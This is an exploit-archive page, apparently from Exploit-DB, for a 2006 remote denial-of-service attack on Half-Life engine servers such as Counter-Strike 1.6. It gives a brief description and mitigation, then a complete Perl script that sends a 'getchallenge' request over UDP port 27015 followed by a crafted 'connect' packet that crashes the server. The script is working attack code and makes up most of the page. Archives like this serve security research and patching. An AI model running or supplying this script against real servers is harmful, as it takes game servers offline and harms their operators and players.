Half-Life engine remote DoS exploit

vendor:

Half-Life engine

by:

Firestorm

7,5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Half-Life engine

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2006

Half-Life engine remote DoS exploit

This exploit is used to cause a denial of service on a Half-Life engine server. It is done by creating a socket connection to the server on port 27015 and sending a 'getchallenge' command followed by a 'connect' command with a specific key. This causes the server to crash.

Mitigation:

Ensure that the server is not running Steam and that the server is running the latest version of the Half-Life engine.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{       econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
        my $host=$_[0];
        my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
        die "Could not create socket: $!\n" unless $sock;
        $cmd="\xff\xff\xff\xff";
        syswrite $sock, $cmd."getchallenge";

        sysread $sock,$b,65535;  print $b,"\n";
        @c=split(/ /,$b);

        $c2=$c[1];

        $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

# milw0rm.com [2006-02-11]